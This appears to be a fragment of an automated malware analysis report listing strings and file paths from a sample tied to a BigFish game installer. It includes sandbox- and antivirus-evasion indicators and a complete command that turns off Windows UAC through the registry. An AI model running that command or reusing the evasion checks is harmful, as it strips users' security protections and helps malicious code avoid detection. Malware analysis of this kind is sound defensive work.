"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>d Settings\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe</pre><pre>%Documents and Settings%\All Users\Application Data\BigFishCache</pre><pre>"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe"</pre><pre>%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack</pre><pre>%Program Files%\bfgclient</pre><pre>%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller</pre><pre>bfgsetup_s1_l1.exe</pre><pre>CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsxB.tmp</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\</pre><pre>%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe</pre><pre>1510605463</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe</pre><pre>3.3.0.2</pre><pre>04090000</pre><b>Ptype.exe_1144_rwx_13140000_00011000:</b><pre>.idata</pre><pre>.rdata</pre><pre>P.reloc</pre><pre>P.rsrc</pre><pre>BuildImportTable: can't load library:</pre><pre>BuildImportTable: ReallocMemory failed</pre><pre>BuildImportTable: GetProcAddress failed</pre><pre>BTMemoryLoadLibary: BuildImportTable failed</pre><pre>BTMemoryGetProcAddress: no export table found</pre><pre>BTMemoryGetProcAddress: DLL doesn't export anything</pre><pre>BTMemoryGetProcAddress: exported symbol not found</pre><pre>kernel32.dll</pre><pre>76487-644-3177037-23510</pre><pre>55274-640-2673064-23950</pre><pre>sbiedll.dll</pre><pre>dbghelp.dll</pre><pre>RLHOOK32.DLL</pre><pre>snxhk.dll</pre><pre>Software\Microsoft\Windows\CurrentVersion</pre><pre>ntdll.dll</pre><pre>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f</pre><pre>%sysdir%\</pre><pre>%sysdir%</pre><pre>~a39.log</pre><pre>cmd_.bat</pre><pre>sevane.tmp</pre><pre>user32.dll</pre><pre>cmd.dll</pre><pre>~a21524.log</pre><pre>GetProcessHeap</pre><pre>oleaut32.dll</pre><pre>advapi32.dll</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyA</pre><pre>RegCloseKey</pre><pre>WinExec</pre><pre>GetWindowsDirectoryA</pre><pre>wsock32.dll</pre><pre>shell32.dll</pre><pre>ShellExecuteA</pre><pre>7'7 7/73777;7?7!8<8</pre><pre>KWindows</pre><pre>66006666</pre></VeriSign></pre></pre></VeriSign></pre>